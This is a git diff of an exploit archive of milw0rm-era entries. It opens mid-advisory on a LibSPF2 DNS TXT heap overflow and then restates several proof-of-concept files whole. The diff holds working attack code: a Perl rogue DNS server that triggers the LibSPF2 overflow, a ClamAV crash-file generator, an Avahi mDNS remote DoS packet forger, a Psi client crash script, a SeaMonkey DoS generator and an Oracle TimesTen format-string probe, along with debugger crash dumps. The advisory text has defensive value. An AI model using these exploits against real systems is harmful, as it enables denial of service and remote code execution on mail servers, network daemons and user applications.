-AAAAAAAAAAAAAAAA -00000120 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 -AAAAAAAAAAAAAAAA -00000130 41 A - -The altered length field, on 0x2C, is what’s causing the overflow. -Sample code to reproduce the above is attached at the end of this paper. - -Conclusion: - -There’s nothing particularly special about this bug – we’ve even seen -this in mail servers before. But it is apparently present on some very -high profile and high traffic systems. SPF is a major part of how the -Internet attempts to filter SPAM, and while it’s not perfect, it is -pretty helpful. LibSPF2 is one of the more common libraries out there -for handling SPF traffic, with billions of messages a day being -protected by it. 
- -Unfortunately, that also means billions of messages a day are at risk – -the nature of this flaw is such that an attacker can force arbitrary (or -at least ASCII encoded, though no nameservers have been found that -enforce ASCII) bytes to be copied into a buffer too small to contain -them. This is a straightforward anonymous remote code execution find, -made interesting specifically by where the bug happens to be. - - -Appendix: Simple code to reproduce heap overflow. - - -# cat spfattack.pl -#!/usr/bin/perl -# - -use Net::DNS; -use IO::Socket::INET; -use Data::HexDump; - - -my $qclass = "IN"; -my $ttl = 10; - -while (1){ - my $sock = IO::Socket::INET->new( - LocalPort => '53', - Proto => 'udp'); - $sock->recv($newmsg, 2048); - my $req = Net::DNS::Packet->new(\$newmsg); - $req->print; - my $id = $req->header->id(); - my @q = $req->question; - my $qname = $q[0]->qname; - my $qtype = $q[0]->qtype; - if($qtype eq "PTR") { next; } - $answer = Net::DNS::Packet->new($qname, $qtype); - if($qtype eq "TXT"){ - $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype -'v=spf1 mx +all'")); - $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype -'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'")); - } - if($qtype eq "MX"){} - - $answer->header->id($id); - $answer->header->aa(1); - $answer->header->qr(1); - $answer->print; - my $port = $sock->peerport; - my $peer = inet_ntoa($sock->peeraddr); - - $sock->shutdown(2); - $sock = ""; - - my $tempsock = IO::Socket::INET->new( - LocalPort=>'53', - PeerAddr=>"$peer", - PeerPort=>$port, - Proto=>'udp'); - - - my $newans; - - $newans = $answer->data; - if($qtype eq "TXT"){ - substr($newans, 44, 1, pack("c",0xff)); - print HexDump $newans; - } - $tempsock->send($newans); - - - #my $packet = Net::DNS::Packet->new(\$newmsg); -} - 
-# milw0rm.com [2008-10-22] +Advisory: DNS TXT Record Parsing Bug in LibSPF2 +Author: Dan Kaminsky, Director of Penetration Testing, IOActive Inc, +Dan.Kaminsky@ioactive.com (PGP Key In Appendix) +Abstract: + +A relatively common bug parsing TXT records delivered over DNS, dating +at least back to 2002 in Sendmail 8.2.0 and almost certainly much +earlier, has been found in LibSPF2, a library frequently used to +retrieve SPF (Sender Policy Framework) records and apply policy +according to those records. This implementation flaw allows for +relatively flexible memory corruption, and should thus be treated as a +path to anonymous remote code execution. Of particular note is that the +remote code execution would occur on servers specifically designed to +receive E-Mail from the Internet, and that these systems may in fact be +high volume mail exchangers. This creates privacy implications. It is +also the case that a corrupted email server is a useful “jumping off” +point for attackers to corrupt desktop machines, since attachments can +be corrupted with malware while the containing message stays intact. So +there are internal security implications as well, above and beyond +corruption of the mail server on the DMZ. + +Recommendations: + +If you are a major mail exchange, you should determine whether the SPAM +filters that protect your systems use LibSPF2. + +If you are a vendor of anti-SPAM devices, or the author of an operating +system with components that may use LibSPF2, you should determine +whether LibSPF2 is used in any of your configurations and migrate to +LibSPF 1.2.8, found at: + + http://www.libspf2.org/index.html + +If your product has a dependency on DNS TXT records, we recommend you +test it for the parsing bug that LibSPF2 was vulnerable to, since this +has been a problem for some time. Name server implementations may want +to consider adding filtering themselves, though record validation is not +normally their job. 
+ +Details: DNS TXT records have long been a little tricky to parse, due +to them containing two length fields. First, there is the length field +of the record as a whole. Then, there is a sublength field, from 0 to +255, that describes the length of a particular character string inside +the larger record. There is nothing that links the two values, and DNS +servers to not themselves enforce sanity checks here. As such, there is +always a risk that when receiving a DNS TXT record, the outer record +length will be the amount allocated, but the inner length will be copied. + +In the past, we’ve seen this particular bug all over the place, +including in Sendmail. This is just the same bug, showing up in LibSPF2 +1.2.5: + +Spf_dns_resolv.c#SPF_dns_resolv_lookup(): + + case ns_t_txt: + if ( rdlen > 1 ) + { + u_char *src, *dst; + size_t len; + + if ( SPF_dns_rr_buf_realloc( spfrr, cnt, rdlen ) != +SPF_E_SUCCESS ) // allocate rdlen bytes at spf->rr[cn]->txt + return spfrr; + + dst = spfrr->rr[cnt]->txt; + len = 0; + src = (u_char *)rdata; + while ( rdlen > 0 ) + { + len = *src; // get a second length from the attacker +controlled datastream -- some value from 0 to 255, unbound to rdlen + src++; + memcpy( dst, src, len ); // copy that second length to +rdlen byte buffer. 
+ dst += len; + src += len; + rdlen -= len + 1; + } + *dst = '\0'; + + For validation purposes, a build of LibSPF2 was instrumented, to +validate the heap overflow: + +$ ./spfquery -ip=1.2.3.4 -sender=foo@bar.toorrr.com +buffer 8107080 has size 16 +buffer 8107090 has size 16 +buffer 81070a0 has size 16 +writing 255 bytes to a 15 size buffer at 81070a0 // overflow +buffer 8123030 has size 234 +writing 233 bytes to a 234 size buffer at 8123030 +buffer 81060c0 has size 20 +buffer 81060e0 has size 20 +buffer 8123120 has size 234 +buffer 8106100 has size 31 +StartError +Context: Failed to query MAIL-FROM +ErrorCode: (2) Could not find a valid SPF record +Error: Invalid character in middle of mechanism near 'À + bar.toorrr' +Error: Failed to compile SPF record for 'bar.toorrr.com' +EndError +(invalid) + +The actual record used to spawn this behavior was as follows: + +;; HEADER SECTION +;; id = 63838 +;; qr = 1 opcode = QUERY aa = 1 tc = 0 rd = 1 +;; ra = 0 ad = 0 cd = 0 rcode = NOERROR +;; qdcount = 1 ancount = 2 nscount = 0 arcount = 0 + +;; QUESTION SECTION (1 record) +;; bar.toorrr.com. IN TXT + +;; ANSWER SECTION (2 records) +bar.toorrr.com. 0 IN TXT "v=spf1 mx +all" +bar.toorrr.com. 0 IN TXT +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + +;; AUTHORITY SECTION (0 records) + +;; ADDITIONAL SECTION (0 records) + +Or, in hex: + + 00 01 02 03 04 05 06 07 - 08 09 0A 0B 0C 0D 0E 0F +0123456789ABCDEF + +00000000 F9 5E 85 00 00 01 00 02 - 00 00 00 00 03 62 61 72 +.^...........bar +00000010 06 74 6F 6F 72 72 72 03 - 63 6F 6D 00 00 10 00 01 +.toorrr.com..... +00000020 C0 0C 00 10 00 01 00 00 - 00 00 00 0F FF 76 3D 73 +.............v=s +00000030 70 66 31 20 6D 78 20 2B - 61 6C 6C C0 0C 00 10 00 pf1 mx ++all..... 
+00000040 01 00 00 00 00 00 EA E9 - 41 41 41 41 41 41 41 41 +........AAAAAAAA +00000050 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000060 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000070 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000080 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000090 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000A0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000B0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000C0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000D0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000E0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +000000F0 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000100 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000110 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000120 41 41 41 41 41 41 41 41 - 41 41 41 41 41 41 41 41 +AAAAAAAAAAAAAAAA +00000130 41 A + +The altered length field, on 0x2C, is what’s causing the overflow. +Sample code to reproduce the above is attached at the end of this paper. + +Conclusion: + +There’s nothing particularly special about this bug – we’ve even seen +this in mail servers before. But it is apparently present on some very +high profile and high traffic systems. SPF is a major part of how the +Internet attempts to filter SPAM, and while it’s not perfect, it is +pretty helpful. LibSPF2 is one of the more common libraries out there +for handling SPF traffic, with billions of messages a day being +protected by it. 
+ +Unfortunately, that also means billions of messages a day are at risk – +the nature of this flaw is such that an attacker can force arbitrary (or +at least ASCII encoded, though no nameservers have been found that +enforce ASCII) bytes to be copied into a buffer too small to contain +them. This is a straightforward anonymous remote code execution find, +made interesting specifically by where the bug happens to be. + + +Appendix: Simple code to reproduce heap overflow. + + +# cat spfattack.pl +#!/usr/bin/perl +# + +use Net::DNS; +use IO::Socket::INET; +use Data::HexDump; + + +my $qclass = "IN"; +my $ttl = 10; + +while (1){ + my $sock = IO::Socket::INET->new( + LocalPort => '53', + Proto => 'udp'); + $sock->recv($newmsg, 2048); + my $req = Net::DNS::Packet->new(\$newmsg); + $req->print; + my $id = $req->header->id(); + my @q = $req->question; + my $qname = $q[0]->qname; + my $qtype = $q[0]->qtype; + if($qtype eq "PTR") { next; } + $answer = Net::DNS::Packet->new($qname, $qtype); + if($qtype eq "TXT"){ + $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype +'v=spf1 mx +all'")); + $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype +'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'")); + } + if($qtype eq "MX"){} + + $answer->header->id($id); + $answer->header->aa(1); + $answer->header->qr(1); + $answer->print; + my $port = $sock->peerport; + my $peer = inet_ntoa($sock->peeraddr); + + $sock->shutdown(2); + $sock = ""; + + my $tempsock = IO::Socket::INET->new( + LocalPort=>'53', + PeerAddr=>"$peer", + PeerPort=>$port, + Proto=>'udp'); + + + my $newans; + + $newans = $answer->data; + if($qtype eq "TXT"){ + substr($newans, 44, 1, pack("c",0xff)); + print HexDump $newans; + } + $tempsock->send($newans); + + + #my $packet = Net::DNS::Packet->new(\$newmsg); +} + 
+# milw0rm.com [2008-10-22] diff --git a/platforms/multiple/dos/7330.c b/platforms/multiple/dos/7330.c index 83f469e72..f4c918ce1 100755 --- a/platforms/multiple/dos/7330.c +++ b/platforms/multiple/dos/7330.c 
@@ -1,90 +1,90 @@
-/*
-There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably
-older versions) in the jpeg parsing code.
-it scan's the jpeg file, and if there is a thumbnail, it'll scan that too. the
-thumbnail itself is just another jpeg
-file and the same jpeg scanning function gets called without checking any kind
-of recurising limit. this can easely
-lead to a recurisive stack overflow. the vulnerable code looks like:
-clamav-0.94\libclamav\special.c
-int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file
-{
-...
- if ((retval=jpeg_check_photoshop(fd)) != 0) {
- return retval;
- }
-...
-}
-...
-static int jpeg_check_photoshop(int fd)
-{
-...
- retval = jpeg_check_photoshop_8bim(fd);
-...
-}
-...
-static int jpeg_check_photoshop_8bim(int fd)
-{
-...
- retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit()
-again without any recursive checks !
-...
-}
-
-the exploit shown below triggers this recursive stack overflow by creating a
-fake jpg file. once created and passed on
-to clamav it'll go in a recursive stack loop untill clamav runs out of stack
-memory and causes a stack overflow. effectively
-crashing clamav. The exploit was tested on clamav 0.94 on opensolaris running
-in a vmware.
-exploit:
-*/
-
-const char crashstr[] = "\xff\xd8" // jpg marker
- "\xff\xed" // exif data
- "\x00\x02" // length
- "Photoshop 3.0\x00"
- "8BIM"
- "\x04\x0c" // thumbnail id
- "\x00"
- "\x01"
- "\x01\x01\x01\x01"
- "0123456789012345678912345678"; // skip over 28 bytes
-
-#include
-#include
-#include
-
-#define NR_ITER 200000
-
-int main() {
- FILE *fp;
- int i;
- fp = fopen("clamav-jpeg-crash.jpg", "w+");
- if (!fp) {
- printf("can't open/create file\n");
- exit(0);
- }
- for (i = 0; i < NR_ITER; i++) {
- fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
-fp);
- }
- fclose(fp);
- printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
- exit(0);
-}
-
-/*
-result:
-ilja@opensolaris:~$ ./jpg
-done, now run clamscan on ./clamav-jpeg-crash.jpg
-ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg
-LibClamAV Warning: **************************************************
-LibClamAV Warning: *** The virus database is older than 7 days! ***
-LibClamAV Warning: *** Please update it as soon as possible. ***
-LibClamAV Warning: **************************************************
-Segmentation Fault <-- clamav crashed !
-ilja@opensolaris:~$
-*/
-
-// milw0rm.com [2008-12-03]
+/*
+There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably
+older versions) in the jpeg parsing code.
+it scan's the jpeg file, and if there is a thumbnail, it'll scan that too. the
+thumbnail itself is just another jpeg
+file and the same jpeg scanning function gets called without checking any kind
+of recurising limit. this can easely
+lead to a recurisive stack overflow. the vulnerable code looks like:
+clamav-0.94\libclamav\special.c
+int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file
+{
+...
+ if ((retval=jpeg_check_photoshop(fd)) != 0) {
+ return retval;
+ }
+...
+}
+...
+static int jpeg_check_photoshop(int fd)
+{
+...
+ retval = jpeg_check_photoshop_8bim(fd);
+...
+}
+...
+static int jpeg_check_photoshop_8bim(int fd)
+{
+...
+ retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit()
+again without any recursive checks !
+...
+}
+
+the exploit shown below triggers this recursive stack overflow by creating a
+fake jpg file. once created and passed on
+to clamav it'll go in a recursive stack loop untill clamav runs out of stack
+memory and causes a stack overflow. effectively
+crashing clamav. The exploit was tested on clamav 0.94 on opensolaris running
+in a vmware.
+exploit:
+*/
+
+const char crashstr[] = "\xff\xd8" // jpg marker
+ "\xff\xed" // exif data
+ "\x00\x02" // length
+ "Photoshop 3.0\x00"
+ "8BIM"
+ "\x04\x0c" // thumbnail id
+ "\x00"
+ "\x01"
+ "\x01\x01\x01\x01"
+ "0123456789012345678912345678"; // skip over 28 bytes
+
+#include
+#include
+#include
+
+#define NR_ITER 200000
+
+int main() {
+ FILE *fp;
+ int i;
+ fp = fopen("clamav-jpeg-crash.jpg", "w+");
+ if (!fp) {
+ printf("can't open/create file\n");
+ exit(0);
+ }
+ for (i = 0; i < NR_ITER; i++) {
+ fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
+fp);
+ }
+ fclose(fp);
+ printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
+ exit(0);
+}
+
+/*
+result:
+ilja@opensolaris:~$ ./jpg
+done, now run clamscan on ./clamav-jpeg-crash.jpg
+ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg
+LibClamAV Warning: **************************************************
+LibClamAV Warning: *** The virus database is older than 7 days! ***
+LibClamAV Warning: *** Please update it as soon as possible. ***
+LibClamAV Warning: **************************************************
+Segmentation Fault <-- clamav crashed !
+ilja@opensolaris:~$
+*/
+
+// milw0rm.com [2008-12-03]
diff --git a/platforms/multiple/dos/7467.txt b/platforms/multiple/dos/7467.txt
index 6821c3d9f..b39b7d549 100755
--- a/platforms/multiple/dos/7467.txt
+++ b/platforms/multiple/dos/7467.txt
@@ -1,29 +1,29 @@
-Amaya Web Browser html tag overflow (quite a few tags are vulnerable)
-
-(gdb) i r
-eax 0x41414141 1094795585
-ecx 0x0 0
-edx 0xbfc0ff80 -1077870720
-ebx 0x9ec1220 166466080
-esp 0xbfc10064 0xbfc10064
-ebp 0xbfc10268 0xbfc10268
-esi 0xa2f64a0 170878112
-edi 0xbfc10160 -1077870240
-eip 0x8144b40 0x8144b40
-eflags 0x10246 [ PF ZF IF RF ]
-cs 0x73 115
-ss 0x7b 123
-ds 0x7b 123
-es 0x7b 123
-fs 0x0 0
-gs 0x33 51
-(gdb) x/10x $ebp
-0xbfc10268: 0x41414141 0x41414141 0x41414141 0x41414141
-0xbfc10278: 0x41414141 0x41414141 0x41414141 0x41414141
-0xbfc10288: 0x41414141 0x41414141
-
-
-#cat test.html
-webDEViL
-
-# milw0rm.com [2008-12-15]
+Amaya Web Browser html tag overflow (quite a few tags are vulnerable)
+
+(gdb) i r
+eax 0x41414141 1094795585
+ecx 0x0 0
+edx 0xbfc0ff80 -1077870720
+ebx 0x9ec1220 166466080
+esp 0xbfc10064 0xbfc10064
+ebp 0xbfc10268 0xbfc10268
+esi 0xa2f64a0 170878112
+edi 0xbfc10160 -1077870240
+eip 0x8144b40 0x8144b40
+eflags 0x10246 [ PF ZF IF RF ]
+cs 0x73 115
+ss 0x7b 123
+ds 0x7b 123
+es 0x7b 123
+fs 0x0 0
+gs 0x33 51
+(gdb) x/10x $ebp
+0xbfc10268: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbfc10278: 0x41414141 0x41414141 0x41414141 0x41414141
+0xbfc10288: 0x41414141 0x41414141
+
+
+#cat test.html
+webDEViL
+
+# milw0rm.com [2008-12-15]
diff --git a/platforms/multiple/dos/7520.c b/platforms/multiple/dos/7520.c
index e43a6e6b0..dea44026e 100755
--- a/platforms/multiple/dos/7520.c
+++ b/platforms/multiple/dos/7520.c
@@ -1,85 +1,85 @@
-/*
- * cve-2008-5081.c
- *
- * Avahi mDNS Daemon Remote DoS < 0.6.24
- * Jon Oberheide
- * http://jon.oberheide.org
- *
- * Usage:
- *
- * gcc cve-2008-5081.c -ldnet -o cve-2008-5081
- * ./cve-2008-5081 1.2.3.4
- *
- * Information:
- *
- * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
- *
- * Crafted mDNS packet with source port 0 can cause avahi-daemon
- * to abort() due to failed assertion assert(port > 0); in
- * originates_from_local_legacy_unicast_socket() function in
- * avahi-core/server.c.
- *
- */
-
-#include
-#include
-#include
-#include
-
-int
-main(int argc, char **argv)
-{
- ip_t *sock;
- intf_t *intf;
- struct addr dst;
- struct ip_hdr *ip;
- struct udp_hdr *udp;
- struct intf_entry entry;
- int len = IP_HDR_LEN + UDP_HDR_LEN;
- char buf[len];
-
- if (argc < 2 || addr_aton(argv[1], &dst)) {
- printf("error: please specify a target ip address\n");
- return 1;
- }
-
- memset(buf, 0, sizeof(buf));
-
- ip = (struct ip_hdr *) buf;
- ip->ip_v = 4;
- ip->ip_hl = 5;
- ip->ip_tos = 0;
- ip->ip_off = 0;
- ip->ip_sum = 0;
- ip->ip_ttl = IP_TTL_MAX;
- ip->ip_p = IP_PROTO_UDP;
- ip->ip_id = htons(0xdead);
- ip->ip_len = htons(len);
-
- udp = (struct udp_hdr *) (buf + IP_HDR_LEN);
-
- udp->uh_sum = 0;
- udp->uh_sport = htons(0);
- udp->uh_dport = htons(5353);
- udp->uh_ulen = htons(UDP_HDR_LEN);
-
- intf = intf_open();
- intf_get_dst(intf, &entry, &dst);
- intf_close(intf);
-
- ip->ip_src = entry.intf_addr.addr_ip;
- ip->ip_dst = dst.addr_ip;
- ip_checksum(buf, len);
-
- sock = ip_open();
- if (!sock) {
- printf("error: root privileges needed for raw socket\n");
- return 1;
- }
- ip_send(sock, buf, len);
- ip_close(sock);
-
- return 0;
-}
-
-// milw0rm.com [2008-12-19]
+/*
+ * cve-2008-5081.c
+ *
+ * Avahi mDNS Daemon Remote DoS < 0.6.24
+ * Jon Oberheide
+ * http://jon.oberheide.org
+ *
+ * Usage:
+ *
+ * gcc cve-2008-5081.c -ldnet -o cve-2008-5081
+ * ./cve-2008-5081 1.2.3.4
+ *
+ * Information:
+ *
+ * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
+ *
+ * Crafted mDNS packet with source port 0 can cause avahi-daemon
+ * to abort() due to failed assertion assert(port > 0); in
+ * originates_from_local_legacy_unicast_socket() function in
+ * avahi-core/server.c.
+ *
+ */
+
+#include
+#include
+#include
+#include
+
+int
+main(int argc, char **argv)
+{
+ ip_t *sock;
+ intf_t *intf;
+ struct addr dst;
+ struct ip_hdr *ip;
+ struct udp_hdr *udp;
+ struct intf_entry entry;
+ int len = IP_HDR_LEN + UDP_HDR_LEN;
+ char buf[len];
+
+ if (argc < 2 || addr_aton(argv[1], &dst)) {
+ printf("error: please specify a target ip address\n");
+ return 1;
+ }
+
+ memset(buf, 0, sizeof(buf));
+
+ ip = (struct ip_hdr *) buf;
+ ip->ip_v = 4;
+ ip->ip_hl = 5;
+ ip->ip_tos = 0;
+ ip->ip_off = 0;
+ ip->ip_sum = 0;
+ ip->ip_ttl = IP_TTL_MAX;
+ ip->ip_p = IP_PROTO_UDP;
+ ip->ip_id = htons(0xdead);
+ ip->ip_len = htons(len);
+
+ udp = (struct udp_hdr *) (buf + IP_HDR_LEN);
+
+ udp->uh_sum = 0;
+ udp->uh_sport = htons(0);
+ udp->uh_dport = htons(5353);
+ udp->uh_ulen = htons(UDP_HDR_LEN);
+
+ intf = intf_open();
+ intf_get_dst(intf, &entry, &dst);
+ intf_close(intf);
+
+ ip->ip_src = entry.intf_addr.addr_ip;
+ ip->ip_dst = dst.addr_ip;
+ ip_checksum(buf, len);
+
+ sock = ip_open();
+ if (!sock) {
+ printf("error: root privileges needed for raw socket\n");
+ return 1;
+ }
+ ip_send(sock, buf, len);
+ ip_close(sock);
+
+ return 0;
+}
+
+// milw0rm.com [2008-12-19]
diff --git a/platforms/multiple/dos/7555.py b/platforms/multiple/dos/7555.py
index 74dc87206..34e1db714 100755
--- a/platforms/multiple/dos/7555.py
+++ b/platforms/multiple/dos/7555.py
@@ -1,23 +1,23 @@
-#!/usr/bin/python
-#psi jabber client 8010/tcp remote denial of service (win & lin)
-#by sha0[at]badchecksum.net
-#http://jolmos.blogspot.com
-
-import socket, sys
-
-sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-try:
- sock.connect((sys.argv[1],8010))
-except:
- print 'Cannot connect!'
- sys.exit(1)
-
-try:
- sock.send('\x05\xff')
- print 'Crashed!'
-except:
- print 'Cannot send!'
-
-sock.close()
-
-# milw0rm.com [2008-12-23]
+#!/usr/bin/python
+#psi jabber client 8010/tcp remote denial of service (win & lin)
+#by sha0[at]badchecksum.net
+#http://jolmos.blogspot.com
+
+import socket, sys
+
+sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+ sock.connect((sys.argv[1],8010))
+except:
+ print 'Cannot connect!'
+ sys.exit(1)
+
+try:
+ sock.send('\x05\xff')
+ print 'Crashed!'
+except:
+ print 'Cannot send!'
+
+sock.close()
+
+# milw0rm.com [2008-12-23]
diff --git a/platforms/multiple/dos/7564.pl b/platforms/multiple/dos/7564.pl
index d76aaf273..352301aff 100755
--- a/platforms/multiple/dos/7564.pl
+++ b/platforms/multiple/dos/7564.pl
@@ -1,57 +1,57 @@
-#!/usr/bin/perl
-#
-# Getleft v1.2.0.0 DoS PoC
-# Author: Koshi
-#
-# Application: Getleft v1.2
-# Publisher: Andres Garcia ( http://personal1.iddeo.es/andresgarci/getleft/english/index.html )
-# Description: Website Downloader, for such things as offline browsing.
-# Tested On: Windows XP SP2
-#
-# Module: Getleft.exe
-# eax=00c5f170 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00c5f170
-# eip=004863eb esp=0022d9b0 ebp=010b4870 iopl=0 nv up ei pl nz na po nc
-# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
-#
-# Getleft+0x863eb:
-# 004863eb 8b06 mov eax,dword ptr [esi] ds:0023:00000000=????????
-#
-# , ,
-
-
-# milw0rm.com [2009-01-05]
+
+
+
+
+
+
+# milw0rm.com [2009-01-05]
diff --git a/platforms/multiple/dos/7685.pl b/platforms/multiple/dos/7685.pl
index 576f02de2..8386a1e06 100755
--- a/platforms/multiple/dos/7685.pl
+++ b/platforms/multiple/dos/7685.pl
@@ -1,38 +1,38 @@
-#!/usr/bin/perl
-# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
-# by athos - staker[at]hotmail[dot]it
-# tested on ubuntu 8.10 / slackware 12.2
-# thanks to SirDark because he has tested on slackware
-
-my $data = undef;
-my $file = shift or &usage;
-
-exploit();
-
-sub exploit {
-
- $data .= "";
- $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit";
- $data .= "";
- $data .= "" x900;
- $data .= "";
-
- open(FILE,'>',$file) or die('file error');
- print FILE $data;
- close(FILE);
-}
-
-
-sub usage {
-
- print "\n+---------------------------------------------------------+\r".
- "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r".
- "\n+---------------------------------------------------------+\r".
- "\nby athos - staker[at]hotmail[dot]it\n".
- "\nUsage\n".
- "\rperl $0 [file name]\n".
- "\rperl $0 crash.html\n";
- exit;
-}
-
-# milw0rm.com [2009-01-06]
+#!/usr/bin/perl
+# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
+# by athos - staker[at]hotmail[dot]it
+# tested on ubuntu 8.10 / slackware 12.2
+# thanks to SirDark because he has tested on slackware
+
+my $data = undef;
+my $file = shift or &usage;
+
+exploit();
+
+sub exploit {
+
+ $data .= "";
+ $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit";
+ $data .= "";
+ $data .= "" x900;
+ $data .= "";
+
+ open(FILE,'>',$file) or die('file error');
+ print FILE $data;
+ close(FILE);
+}
+
+
+sub usage {
+
+ print "\n+---------------------------------------------------------+\r".
+ "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r".
+ "\n+---------------------------------------------------------+\r".
+ "\nby athos - staker[at]hotmail[dot]it\n".
+ "\nUsage\n".
+ "\rperl $0 [file name]\n".
+ "\rperl $0 crash.html\n";
+ exit;
+}
+
+# milw0rm.com [2009-01-06]
diff --git a/platforms/multiple/dos/7785.py b/platforms/multiple/dos/7785.py
index 2c7e57ad9..f4908cc90 100755
--- a/platforms/multiple/dos/7785.py
+++ b/platforms/multiple/dos/7785.py
@@ -1,28 +1,28 @@
-#!/usr/bin/python
-
-"""
-Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009
-Copyright (c) Joxean Koret 2009
-"""
-
-import sys
-import socket
-
-def testPoc(host):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((host, 17000))
- buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
- print "Sending: %s" % buf
- s.send(buf)
- print s.recv(4096)
- s.close()
-
-if __name__ == "__main__":
- if len(sys.argv) == 1:
- print "Usage:", sys.argv[0], ""
- print
- sys.exit(1)
- else:
- testPoc(sys.argv[1])
-
-# milw0rm.com [2009-01-14]
+#!/usr/bin/python
+
+"""
+Oracle TimesTen Remote Format String (Fixed in Oracle CPU Jan 2009
+Copyright (c) Joxean Koret 2009
+"""
+
+import sys
+import socket
+
+def testPoc(host):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, 17000))
+ buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n"
+ print "Sending: %s" % buf
+ s.send(buf)
+ print s.recv(4096)
+ s.close()
+
+if __name__ == "__main__":
+ if len(sys.argv) == 1:
+ print "Usage:", sys.argv[0], ""
+ print
+ sys.exit(1)
+ else:
+ testPoc(sys.argv[1])
+
+# milw0rm.com [2009-01-14]
diff --git a/platforms/multiple/dos/7812.pl b/platforms/multiple/dos/7812.pl
index 043420062..8cdc9efae 100755
--- a/platforms/multiple/dos/7812.pl
+++ b/platforms/multiple/dos/7812.pl
@@ -1,49 +1,49 @@
-#!/usr/bin/perl
-# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
-# PoC by Amirreza Aminsalehi "sCORPINo"
-# (Proud To be an Abay)
-# scorpino x40 gmail x2e com
-# Snoop Security Researching Committee
-# www.snoop-security.com
-# Originaly this bug discovered by Tobias Klein
-# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt
-# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;)
-# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers.
-# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members
-###########################################################################################
-# You Can See Debug dumps here:
